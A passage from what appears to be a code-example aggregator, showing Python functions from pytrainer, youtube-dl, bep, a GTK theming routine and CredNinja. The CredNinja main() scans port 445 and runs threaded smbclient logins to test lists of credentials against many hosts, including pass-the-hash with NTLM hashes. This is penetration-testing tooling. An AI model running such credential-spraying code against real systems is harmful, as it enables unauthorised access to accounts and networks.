            basecol = Gdk.RGBA(red=0.929412,
                               green=0.929412,
                               blue=0.929412,
                               alpha=1.0)

    # text color
    found, textcol = style_ctxt.lookup_color("text_color")
    if not found:
        found, textcol = style_ctxt.lookup_color("theme_text_color")
        if not found:
            textcol = Gdk.RGBA(red=0.180392,
                               green=0.203922,
                               blue=0.211765,
                               alpha=1.0)

    def get_col(col, mult):
        red = col.red * mult
        green = col.green * mult
        blue = col.blue * mult
        if red > 1.0:
            red = 1.0
        if green > 1.0:
            green = 1.0
        if blue > 1.0:
            blue = 1.0
        if red == 1 and green == 1 and blue == 1:
            return Gdk.RGBA(0.99, 0.99, 0.99, 1.0)
        else:
            return Gdk.RGBA(red, green, blue, 1.0)

    # derive other colors
    bgacol = get_col(bgcol, 0.9)                # bg_active
    dcol = get_col(bgcol, 0.7)                  # dark
    darksel = get_col(bgsel, 0.71)              # dark selected
    dpcol = get_col(bgcol, 0.71)                # dark prelight
    dacol = get_col(dcol, 0.9)                  # dark_active
    lcol = get_col(bgcol, 1.3)                  # light color
    lightsel = get_col(bgsel, 1.3)              # light selected
    fgsel = Gdk.RGBA(0.99, 0.99, 0.99, 1.0)     # fg selected
    fgpcol = get_col(fgcol, 1.054)              # fg prelight
    fgacol = Gdk.RGBA(0.0, 0.0, 0.0, 1.0)       # fg active
    textaacol = Gdk.RGBA(
        min(
            (basecol.red + textcol.red) / 2., 1.0), min(
                (basecol.green + textcol.green) / 2., 1.0), min(
                    (basecol.blue + textcol.blue) / 2., 1.0))  # text_aa

    data = "@define-color p_bg_color " + hexcol(bgcol) + ";" \
        "@define-color p_bg_prelight " + hexcol(bgcol) + ";" \
        "@define-color p_bg_active " + hexcol(bgacol) + ";" \
        "@define-color p_bg_selected " + hexcol(bgsel) + ";" \
        "@define-color p_bg_insensitive " + hexcol(bgcol) + ";" \
        "@define-color p_base_color " + hexcol(basecol) + ";" \
        "@define-color p_dark_color " + hexcol(dcol) + ";" \
        "@define-color p_dark_prelight " + hexcol(dpcol) + ";" \
        "@define-color p_dark_active " + hexcol(dacol) + ";" \
        "@define-color p_dark_selected " + hexcol(darksel) + ";" \
        "@define-color p_text_aa " + hexcol(textaacol) + ";" \
        "@define-color p_light_color " + hexcol(lcol) + ";" \
        "@define-color p_light_selected " + hexcol(lightsel) + ";" \
        "@define-color p_fg_color " + hexcol(fgcol) + ";" \
        "@define-color p_fg_prelight " + hexcol(fgpcol) + ";" \
        "@define-color p_fg_selected " + hexcol(fgsel) + ";" \
        "@define-color p_fg_active " + hexcol(fgacol) + ";"

    if provider is not None:
        style_ctxt.remove_provider_for_screen(Gdk.Screen.get_default(), provider)

    provider = Gtk.CssProvider.new()
    provider.load_from_data(data.encode())
    style_ctxt.add_provider_for_screen(Gdk.Screen.get_default(), provider,
                                       Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)

    lnewcolor = bgcol
    dnewcolor = dcol

    # check if changed
    if loldcolor and background is None:
        if lnewcolor.red == loldcolor.red and \
           lnewcolor.green == loldcolor.green and \
           lnewcolor.blue == loldcolor.blue and \
           dnewcolor.red == doldcolor.red and \
           dnewcolor.green == doldcolor.green and \
           dnewcolor.blue == doldcolor.blue:
            return

    loldcolor = lnewcolor
    doldcolor = dnewcolor

    # global colors have been set up
    # now set colors on startup panel
    lnewcolor = style_ctxt.lookup_color("p_bg_color")[1]
    dnewcolor = style_ctxt.lookup_color("p_dark_color")[1]

    colors = [
        int(lnewcolor.red * 255), int(lnewcolor.green * 255),
        int(lnewcolor.blue * 255), int(dnewcolor.red * 255),
        int(dnewcolor.green * 255), int(dnewcolor.blue * 255)
    ]

    if background is None:
        background = conf.get("welcome_image", addDataPrefix("glade/clear.png"))

    if not background.endswith("clear.png"):
        pixbuf = GdkPixbuf.Pixbuf.new_from_file(background)
        # for frmat in GdkPixbuf.Pixbuf.get_formats():
        #     print(frmat.get_extensions())
        surface = Gdk.cairo_surface_create_from_pixbuf(pixbuf, 0, None)
        return

    # Check if a cache has been saved
    temppng = addUserCachePrefix("temp.png")
    if path.isfile(temppng):
        fyle = open(temppng, "rb")
        # Check if the cache was made while using the same theme
        if list(fyle.read(6)) == colors:
            surface = cairo.ImageSurface.create_from_png(fyle)
            return

    # Get mostly transparant shadowy image
    imgsurface = cairo.ImageSurface.create_from_png(background)
    avgalpha = 108 / 255.

    surface = cairo.ImageSurface(cairo.FORMAT_RGB24, imgsurface.get_width(),
                                 imgsurface.get_height())
    ctx = cairo.Context(surface)
    if lnewcolor.blue * 65535 - dnewcolor.blue * 65535 > 0:
        midtone = dnewcolor.red * 65535 / (3 * (
            lnewcolor.blue * 65535 - dnewcolor.blue * 65535) * (1 - avgalpha))
        ctx.set_source_rgb(lnewcolor.red / 2 + dnewcolor.red * midtone / 2,
                           lnewcolor.green / 2 + dnewcolor.green * midtone / 2,
                           lnewcolor.blue / 2 + dnewcolor.blue * midtone / 2)
        ctx.paint()
    ctx.set_source_surface(imgsurface, 0, 0)
    ctx.paint_with_alpha(.8)

    # Save a cache for later use. Save 'newcolor' in the frist three pixels
    # to check for theme changes between two instances
    fyle = open(temppng, "wb")
    fyle.write(bytes(colors))
    surface.write_to_png(fyle)

Example 42

Project: pytrainer
Source File: windowimportdata.py
View license
    def on_buttonCSVImport_clicked(self, widget):
        logging.debug('>>')
        #Determine values
        dateCol = self.cbCSVDate.get_active()
        distanceCol = self.cbCSVDistance.get_active()
        durationCol = self.cbCSVDuration.get_active()
        titleCol = self.cbCSVTitle.get_active()
        sportCol = self.cbCSVSport.get_active()
        avgspeedCol = self.cbCSVAvgSpeed.get_active()
        maxspeedCol = self.cbCSVMaxSpeed.get_active()
        calCol = self.cbCSVCal.get_active()
        accCol = self.cbCSVAccent.get_active()
        desCol = self.cbCSVDescent.get_active()
        hrCol = self.cbCSVHR.get_active()
        maxHRCol = self.cbCSVMaxHR.get_active()
        paceCol = self.cbCSVPace.get_active()
        maxPaceCol = self.cbCSVMaxPace.get_active()
        commentsCol = self.cbCSVComments.get_active()

        if dateCol == 0:
            #Error need to have at least a date
            self.updateStatusbar(self.statusbarCSVImport, _("ERROR: Must define at least a date column"))
            return

        #Import...
        #Get selected file
        if not os.path.isfile(self.CSVfilename):
            return
        #Read as delimited file
        csvfile = open(self.CSVfilename, 'rb')
        reader = csv.reader(csvfile, delimiter=self.delimiter)
        #Process File

        for i, row in enumerate(reader):
            if self.has_header and i==0:
                #Ignore first row
                continue
            if not row:
                continue
            data = {}
            #Determine dates
            _date = Date().getDateTime(row[dateCol-1])
            #year, month, day = date.split("-")
            date = _date[1].strftime("%Y-%m-%d")
            zuluDateTime = _date[0].strftime("%Y-%m-%dT%H:%M:%SZ")
            localDateTime = str(_date[1])
            data['date'] = date
            data['date_time_utc'] = zuluDateTime
            data['date_time_local'] = localDateTime
            if distanceCol:
                try:
                    data['distance'] = locale.atof(row[distanceCol-1])
                except:
                    data['distance'] = 0
            else:
                data['distance'] = 0
            if durationCol:
                #calculate duration in sec...
                try:
                    _duration = row[durationCol-1]
                except:
                    _duration = 0
                if _duration.count(':') == 2:
                    #Have 00:00:00 duration
                    h, m, s = _duration.split(':')
                    try:
                        durationSec = int(h)*3600 + int(m)*60 + int(s)
                    except:
                        logging.debug("Error calculating duration for '%s'" % _duration)
                        durationSec = None
                else:
                    try:
                        durationSec = locale.atoi(_duration)
                    except:
                        #Unknown duration
                        logging.debug("Could not determine duration for '%s'" % _duration)
                        durationSec = None
                if durationSec is not None:
                    data['duration'] = durationSec
                    data['time'] = str(durationSec)
            if titleCol:
                try:
                    data['title'] = row[titleCol-1]
                except:
                    pass
            if self.checkbCSVForceSport.get_active():
                sport_id = self.pytrainer_main.record.getSportId(self.comboCSVForceSport.get_active_text(),add=True)
                data['sport'] = sport_id
            elif sportCol:
                #retrieving sport id (adding sport if it doesn't exist yet)
                sport_id = self.pytrainer_main.record.getSportId(row[sportCol-1],add=True)
                data['sport'] = sport_id
            else:
                self.comboCSVForceSport.set_active(0)
                sport_id = self.pytrainer_main.record.getSportId(self.comboCSVForceSport.get_active_text(),add=True)
                data['sport'] = sport_id

            if avgspeedCol:
                #
                try:
                    data['average'] = locale.atof(row[avgspeedCol-1])
                except:
                    pass
            if maxspeedCol:
                try:
                    data['maxspeed'] = locale.atof(row[maxspeedCol-1])
                except:
                    pass
            if calCol:
                try:
                    data['calories'] = locale.atoi(row[calCol-1])
                except:
                    pass
            if accCol:
                try:
                    data['upositive'] = locale.atof(row[accCol-1])
                except:
                    pass
            if desCol:
                try:
                    data['unegative'] = locale.atof(row[desCol-1])
                except:
                    pass
            if hrCol:
                try:
                    data['beats'] = locale.atof(row[hrCol-1])
                except:
                    pass
            if maxHRCol:
                try:
                    data['maxbeats'] = locale.atof(row[maxHRCol-1])
                except:
                    pass
            if paceCol:
                try:
                    data['pace'] = locale.atof(row[paceCol-1])
                except:
                    pass
            if maxPaceCol:
                try:
                    data['maxpace'] = locale.atof(row[maxPaceCol-1])
                except:
                    pass
            if commentsCol:
                try:
                    data['comments'] = row[commentsCol--1]
                except:
                    pass

            #Insert into DB
            logging.debug("Data", data)
            self.pytrainer_main.ddbb.insert_dict('records', data)
        #Display message....
        self.updateStatusbar(self.statusbarCSVImport, _("Import completed. %d rows processed") % i)
        #Disable import button
        self.buttonCSVImport.set_sensitive(0)
        logging.debug('<<')

Example 43

Project: CredNinja
Source File: CredNinja.py
View license
def main():
    global output_file_handler, settings, text_green, text_blue, text_yellow, text_red, text_end
    print(text_blue + """


   .d8888b.                       888 888b    888 d8b           d8b          
  d88P  Y88b                      888 8888b   888 Y8P           Y8P          
  888    888                      888 88888b  888                            
  888        888d888 .d88b.   .d88888 888Y88b 888 888 88888b.  8888  8888b.  
  888        888P"  d8P  Y8b d88" 888 888 Y88b888 888 888 "88b "888     "88b 
  888    888 888    88888888 888  888 888  Y88888 888 888  888  888 .d888888 
  Y88b  d88P 888    Y8b.     Y88b 888 888   Y8888 888 888  888  888 888  888 
   "Y8888P"  888     "Y8888   "Y88888 888    Y888 888 888  888  888 "Y888888 
                                                                888          
                                                               d88P          
                                                             888P"           

                    v{} (Built {}) - Chris King (@raikiasec)

                         For help: ./CredNinja.py -h
""".format(version_number,version_build) + text_end)


    if sys.version_info < (3,0):
        print("ERROR: CredNinja runs on Python 3.  Run as \"./CredNinja.py\" or \"python3 CredNinja.py\"!")
        sys.exit(1)
    args = parse_cli_args()
    settings['os'] = args.os
    settings['domain'] = args.domain
    settings['timeout'] = args.timeout
    settings['delay'] = args.delay
    settings['users'] = args.users
    settings['users_time'] = args.users_time
    settings['scan'] = args.scan
    settings['scan_timeout'] = args.scan_timeout
    settings['no_color'] = args.no_color
    hosts_to_check = []
    creds_to_check = []
    mode = 'all'
    if settings['no_color']:
        text_blue = ''
        text_green = ''
        text_red = ''
        text_yellow = ''
        text_end = ''
    if os.path.isfile(args.accounts):
        with open(args.accounts) as accountfile:
            for line in accountfile:
                if line.strip():
                    parts = line.strip().split(args.passdelimiter,1)
                    if len(parts) != 2:
                        print(text_red + "ERROR: Credential '" + line.strip() + "' did not have the password delimiter" + text_end)
                        sys.exit(1)
                    creds_to_check.append(parts)
    else:
        parts = args.accounts.strip().split(args.passdelimiter,1)
        if len(parts) != 2:
            print(text_red + "ERROR: Credential '" + args.accounts.strip() + "' did not have the password delimiter" + text_end)
            sys.exit(1)
        creds_to_check.append(parts)

    if os.path.isfile(args.servers):
        with open(args.servers) as serverfile:
            for line in serverfile:
                if line.strip():
                    hosts_to_check.append(line.strip())
    else:
        hosts_to_check.append(args.servers)
    if len(hosts_to_check) == 0 or len(creds_to_check) == 0:
        print(text_red + "ERROR: You must supply hosts and credentials at least!" + text_end)
        sys.exit(1)
    
    mode = 'a'
    if args.invalid:
        mode = 'i'
    if args.valid:
        mode = 'v'
    if args.invalid and args.valid:
        mode = 'a'

    if args.output:
        output_file_handler = open(args.output, 'w')
    
    command_list = ['smbclient', '-U', '', '', '', '-c', 'dir']
    if args.ntlm and shutil.which('pth-smbclient') is None:
        print(text_red + "ERROR: pth-smbclient is not found!  Make sure you install it (or use Kali!)" + text_end)
        sys.exit(1)
    elif args.ntlm:
        command_list[0] = 'pth-smbclient'
        command_list.append('--pw-nt-hash')
    passwd_header = 'Password'
    if command_list[0] == 'pth-smbclient':
        passwd_header = 'Hash'

    if (len(hosts_to_check) * len(creds_to_check)) < args.threads:
        args.threads = len(hosts_to_check) * len(creds_to_check)

    try:
        if settings['os'] or settings['domain'] or settings['users']:
            print(text_yellow + ("%-35s %-35s %-35s %-25s %s" % ("Server", "Username", passwd_header, "Response", "Info")) + text_end)
        else:
            print(text_yellow + ("%-35s %-35s %-35s %-25s " % ("Server", "Username", passwd_header, "Response")) + text_end)
        print(text_yellow + "------------------------------------------------------------------------------------------------------------------------------------------------------" + text_end)

        if args.stripe == None:
            total = len(hosts_to_check)
            done = -1
            last_status_report = -1
            if settings['scan']:
                print(text_green + "[!] Starting scan of port 445 on all " + str(len(hosts_to_check)) + " hosts...." +  text_end)
            for host in hosts_to_check:
                done += 1
                if settings['scan']:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.settimeout(settings['scan_timeout'])
                    percent_done = int((done / total) * 100)
                    if (percent_done%5 == 0 and percent_done != last_status_report):
                        print(text_green + "[*] " + str(percent_done) + "% done... [" + str(done) + "/" + str(total) + "]" + text_end)
                        last_status_report = percent_done
                    try:
                        s.connect((host,445))
                        s.close()
                    except Exception:
                        print("%-35s %-35s %-35s %-25s" % (host, "N/A", "N/A", text_red + "Failed Portscan" + text_end))
                        continue
                for cred in creds_to_check:
                    credQueue.put([host, cred])
        else:
            if len(hosts_to_check) < len(creds_to_check):
                print(text_red + "ERROR: For striping to work, you must have the same number or more hosts than you do creds!"  + text_end)
                sys.exit(1)
            if (len(creds_to_check) < args.threads):
                args.threads = len(creds_to_check)
            random.shuffle(hosts_to_check)
            for i in range(len(creds_to_check)):
                credQueue.put([hosts_to_check[i], creds_to_check[i]])

        thread_list = []
        for i in range(args.threads):
            thread_list.append(CredThread(mode, command_list))
        for t in thread_list:
            t.daemon = True
            t.start()

        for t in thread_list:
            t.join()
    except KeyboardInterrupt:
        print("\nQuitting!")
        sys.exit(1)
    if output_file_handler is not None:
        output_file_handler.close()

Example 44

Project: youtube-dl
Source File: http.py
View license
    def real_download(self, filename, info_dict):
        url = info_dict['url']
        tmpfilename = self.temp_name(filename)
        stream = None

        # Do not include the Accept-Encoding header
        headers = {'Youtubedl-no-compression': 'True'}
        add_headers = info_dict.get('http_headers')
        if add_headers:
            headers.update(add_headers)
        basic_request = sanitized_Request(url, None, headers)
        request = sanitized_Request(url, None, headers)

        is_test = self.params.get('test', False)

        if is_test:
            request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))

        # Establish possible resume length
        if os.path.isfile(encodeFilename(tmpfilename)):
            resume_len = os.path.getsize(encodeFilename(tmpfilename))
        else:
            resume_len = 0

        open_mode = 'wb'
        if resume_len != 0:
            if self.params.get('continuedl', True):
                self.report_resuming_byte(resume_len)
                request.add_header('Range', 'bytes=%d-' % resume_len)
                open_mode = 'ab'
            else:
                resume_len = 0

        count = 0
        retries = self.params.get('retries', 0)
        while count <= retries:
            # Establish connection
            try:
                data = self.ydl.urlopen(request)
                # When trying to resume, Content-Range HTTP header of response has to be checked
                # to match the value of requested Range HTTP header. This is due to a webservers
                # that don't support resuming and serve a whole file with no Content-Range
                # set in response despite of requested Range (see
                # https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
                if resume_len > 0:
                    content_range = data.headers.get('Content-Range')
                    if content_range:
                        content_range_m = re.search(r'bytes (\d+)-', content_range)
                        # Content-Range is present and matches requested Range, resume is possible
                        if content_range_m and resume_len == int(content_range_m.group(1)):
                            break
                    # Content-Range is either not present or invalid. Assuming remote webserver is
                    # trying to send the whole file, resume is not possible, so wiping the local file
                    # and performing entire redownload
                    self.report_unable_to_resume()
                    resume_len = 0
                    open_mode = 'wb'
                break
            except (compat_urllib_error.HTTPError, ) as err:
                if (err.code < 500 or err.code >= 600) and err.code != 416:
                    # Unexpected HTTP error
                    raise
                elif err.code == 416:
                    # Unable to resume (requested range not satisfiable)
                    try:
                        # Open the connection again without the range header
                        data = self.ydl.urlopen(basic_request)
                        content_length = data.info()['Content-Length']
                    except (compat_urllib_error.HTTPError, ) as err:
                        if err.code < 500 or err.code >= 600:
                            raise
                    else:
                        # Examine the reported length
                        if (content_length is not None and
                                (resume_len - 100 < int(content_length) < resume_len + 100)):
                            # The file had already been fully downloaded.
                            # Explanation to the above condition: in issue #175 it was revealed that
                            # YouTube sometimes adds or removes a few bytes from the end of the file,
                            # changing the file size slightly and causing problems for some users. So
                            # I decided to implement a suggested change and consider the file
                            # completely downloaded if the file size differs less than 100 bytes from
                            # the one in the hard drive.
                            self.report_file_already_downloaded(filename)
                            self.try_rename(tmpfilename, filename)
                            self._hook_progress({
                                'filename': filename,
                                'status': 'finished',
                                'downloaded_bytes': resume_len,
                                'total_bytes': resume_len,
                            })
                            return True
                        else:
                            # The length does not match, we start the download over
                            self.report_unable_to_resume()
                            resume_len = 0
                            open_mode = 'wb'
                            break
            except socket.error as e:
                if e.errno != errno.ECONNRESET:
                    # Connection reset is no problem, just retry
                    raise

            # Retry
            count += 1
            if count <= retries:
                self.report_retry(count, retries)

        if count > retries:
            self.report_error('giving up after %s retries' % retries)
            return False

        data_len = data.info().get('Content-length', None)

        # Range HTTP header may be ignored/unsupported by a webserver
        # (e.g. extractor/scivee.py, extractor/bambuser.py).
        # However, for a test we still would like to download just a piece of a file.
        # To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
        # block size when downloading a file.
        if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
            data_len = self._TEST_FILE_SIZE

        if data_len is not None:
            data_len = int(data_len) + resume_len
            min_data_len = self.params.get('min_filesize')
            max_data_len = self.params.get('max_filesize')
            if min_data_len is not None and data_len < min_data_len:
                self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
                return False
            if max_data_len is not None and data_len > max_data_len:
                self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
                return False

        byte_counter = 0 + resume_len
        block_size = self.params.get('buffersize', 1024)
        start = time.time()

        # measure time over whole while-loop, so slow_down() and best_block_size() work together properly
        now = None  # needed for slow_down() in the first loop run
        before = start  # start measuring
        while True:

            # Download and write
            data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
            byte_counter += len(data_block)

            # exit loop when download is finished
            if len(data_block) == 0:
                break

            # Open destination file just in time
            if stream is None:
                try:
                    (stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
                    assert stream is not None
                    filename = self.undo_temp_name(tmpfilename)
                    self.report_destination(filename)
                except (OSError, IOError) as err:
                    self.report_error('unable to open for writing: %s' % str(err))
                    return False

                if self.params.get('xattr_set_filesize', False) and data_len is not None:
                    try:
                        write_xattr(tmpfilename, 'user.ytdl.filesize', str(data_len).encode('utf-8'))
                    except (XAttrUnavailableError, XAttrMetadataError) as err:
                        self.report_error('unable to set filesize xattr: %s' % str(err))

            try:
                stream.write(data_block)
            except (IOError, OSError) as err:
                self.to_stderr('\n')
                self.report_error('unable to write data: %s' % str(err))
                return False

            # Apply rate limit
            self.slow_down(start, now, byte_counter - resume_len)

            # end measuring of one loop run
            now = time.time()
            after = now

            # Adjust block size
            if not self.params.get('noresizebuffer', False):
                block_size = self.best_block_size(after - before, len(data_block))

            before = after

            # Progress message
            speed = self.calc_speed(start, now, byte_counter - resume_len)
            if data_len is None:
                eta = None
            else:
                eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)

            self._hook_progress({
                'status': 'downloading',
                'downloaded_bytes': byte_counter,
                'total_bytes': data_len,
                'tmpfilename': tmpfilename,
                'filename': filename,
                'eta': eta,
                'speed': speed,
                'elapsed': now - start,
            })

            if is_test and byte_counter == data_len:
                break

        if stream is None:
            self.to_stderr('\n')
            self.report_error('Did not get any data blocks')
            return False
        if tmpfilename != '-':
            stream.close()

        if data_len is not None and byte_counter != data_len:
            raise ContentTooShortError(byte_counter, int(data_len))
        self.try_rename(tmpfilename, filename)

        # Update file modification time
        if self.params.get('updatetime', True):
            info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))

        self._hook_progress({
            'downloaded_bytes': byte_counter,
            'total_bytes': byte_counter,
            'filename': filename,
            'status': 'finished',
            'elapsed': time.time() - start,
        })

        return True

Example 45

Project: bep
Source File: install.py
View license
def install_cmd(args, packages_file, packages_file_path, noise, install_dirs, installed_pkgs_dir):
    ''' Installs package(s) for either cmdline install interface or from .bep_packages file install

    Parameters
    ----------
    args:  a class inst of the argparse namespace with the arguments parsed to use during the install.
    packages_file:  the user's .bep_packages file.
    packages_file_path:  the absolute path to the packages_file.
    noise:  noise class inst with the verbosity level for the amount of output to deliver to stdout.
    install_dirs:  dict of install locations for installed pkgs and install logs.
    installed_pkgs_dir:  the absolute path to the where the downloaded and built pkgs are stored.
    '''

    ##### install from packages file    # FIXME -- this is hacky, fix this
    #if ('pkg_type' in args) and (args.pkg_type == "packages"):
    if args.pkg_type == "packages":
        try:  # bring in the packages file
            sys.dont_write_bytecode = True  # to avoid writing a .pyc files (for the packages file)
            pkgs_module = imp.load_source(packages_file, packages_file_path)    # used to import a hidden file (really hackey)
        except (ImportError, IOError):
            print("No {0} file installed for use.".format(packages_file))
            if not os.path.isfile(packages_file_path):  # create packages file if one doesn't already exist.
                #shutil.copy(join('data', packages_file), packages_file_path)    # create a template packages file
                #print("So created template {0} file for installation of packages.".format(packages_file))

                open(packages_file_path, 'a').close()  # creates an empty packages file
                print("So created empty {0} file for installation of packages.".format(packages_file))

            raise SystemExit("Now add the desired packages to the {} file and re-run install.".format(packages_file))



        def raise_problem(pkg_to_install):
            print("\nError: cannot process entry in {}:".format(packages_file))
            print("\t{}\n".format(pkg_to_install))
            print("Item needs to be specified like such:")
            print("\t{} [language-->]repoType+userName/packageName[^branch]".format(name))
            print("\nNote: language and branch are both optional, and repoType only needs")
            print("to be specified if it's not ambigious given where the package comes from:")
            print("\teg. for a github install:  ipython/ipython")
            print("\teg. for a github install:  python3.3-->ipython/ipython")
            print("\teg. for a bitbucket install:  hg+mchaput/whoosh")
            print("\teg. for a local install:  git+/home/username/path/to/repo")
            raise SystemExit


        for pkg_type, pkgs_from_pkgs_file in pkgs_module.packages.items():
            utils.when_not_quiet_mode(utils.status('\t\tInstalling {0} packages'.format(pkg_type)), noise.quiet)

            if pkgs_from_pkgs_file:

                #####################################################################################################
                # FIXME need to refractor what the packages file is (or refractor this here)
                for pkg_to_install_entry in pkgs_from_pkgs_file:

                    lang_N_repo_type_N_pkg_to_install_N_branch = pkg_to_install_entry.split('-->')  # to see if a language is given
                    if len(lang_N_repo_type_N_pkg_to_install_N_branch) == 2:
                        lang_arg, repo_type_N_pkg_to_install_N_branch = lang_N_repo_type_N_pkg_to_install_N_branch

                        repo_type_N_pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch.split('+')    # to see if repo_type given # NOTE this won't work for pypi pkgs b/c there won't be a repo
                        if len(repo_type_N_pkg_to_install_N_branch) == 2:
                            repo_type, pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch

                            pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                            if len(pkg_to_install_N_branch) == 2:
                                pkg_to_install, branch = pkg_to_install_N_branch
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch)
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #NOTE won't work for pypi installs
                                pkg_to_install = pkg_to_install_N_branch[0]
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    branch = utils.get_default_branch(repo_type)
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch) # use default branch
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            else:   # if too many ^ given
                                raise_problem(pkg_to_install_entry)

                        elif len(repo_type_N_pkg_to_install_N_branch) == 1:     # if repo_type not given
                            pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch[0]
                            if pkg_type in ['github']:
                                repo_type = 'git'

                                pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                                if len(pkg_to_install_N_branch) == 2:
                                    pkg_to_install, branch = pkg_to_install_N_branch
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        args = Args(repo_type, pkg_type, pkg_to_install, branch=branch, language=lang_arg)
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #NOTE won't work for pypi installs
                                    pkg_to_install = pkg_to_install_N_branch[0]
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        branch = utils.get_default_branch(repo_type)
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch) # use default branch
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                else:   # if too many ^ given
                                    raise_problem(pkg_to_install_entry)
                            else:   # if ambigious repo_type (w/ more than one repo_type possible)
                                raise_problem(pkg_to_install_entry)
                        else:   # if too many '+'  given
                            raise_problem(pkg_to_install_entry)

                    elif len(lang_N_repo_type_N_pkg_to_install_N_branch) == 1:  # language not given, use system default lang
                        repo_type_N_pkg_to_install_N_branch = lang_N_repo_type_N_pkg_to_install_N_branch[0]

                        repo_type_N_pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch.split('+')    # to see if repo_type given # FIXME this won't work for pypi pkgs b/c there won't be a repo
                        if len(repo_type_N_pkg_to_install_N_branch) == 2:
                            repo_type, pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch

                            pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                            if len(pkg_to_install_N_branch) == 2:
                                pkg_to_install, branch = pkg_to_install_N_branch
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)     # use default language
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #FIXME won't work for pypi installs
                                pkg_to_install = pkg_to_install_N_branch[0]
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    branch = utils.get_default_branch(repo_type)
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)    # use default language & branch,
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            else:   # if too many ^ given
                                raise_problem(pkg_to_install_entry)

                        elif len(repo_type_N_pkg_to_install_N_branch) == 1:     # if repo_type not given
                            pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch[0]
                            if pkg_type in ['github']:
                                repo_type = 'git'

                                pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                                if len(pkg_to_install_N_branch) == 2:
                                    pkg_to_install, branch = pkg_to_install_N_branch
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)     # use default language
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #FIXME won't work for pypi installs
                                    pkg_to_install = pkg_to_install_N_branch[0]
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        branch = utils.get_default_branch(repo_type)
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)    # use default language & branch,
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                else:   # if too many ^ given
                                    raise_problem(pkg_to_install_entry)
                            else:   # if ambigious repo_type (w/ more than one repo_type possible)
                                raise_problem(pkg_to_install_entry)
                        else:   # if too many '+'  given
                            raise_problem(pkg_to_install_entry)
                    else:   # if not one or two items after "-->" split
                        raise_problem(pkg_to_install_entry)
                    #####################################################################################################

                    # important to see what has previously been installed, so as to not turn on a 2nd version of a package.
                    everything_already_installed = utils.all_pkgs_and_branches_for_all_pkg_types_already_installed(installed_pkgs_dir)

                    pkg_inst = package.create_pkg_inst(args.language, args.pkg_type, install_dirs, args=args) # args are created from the Args class here, unlike where args are the cmdline options for every other action
                    pkg_inst.install(args.pkg_to_install, args, noise, everything_already_installed=everything_already_installed)
            else:
                utils.when_not_quiet_mode('\nNo {0} packages specified in {1} to install.'.format(pkg_type, packages_file), noise.quiet)


    #### install w/ command line arg(s)
    #if 'pkg_to_install' in args:
    else:

        utils.when_not_quiet_mode(utils.status('\t\tInstalling {0} package'.format(args.pkg_type)), noise.quiet)

        pkg_inst = package.create_pkg_inst(args.language, args.pkg_type, install_dirs, args=args)

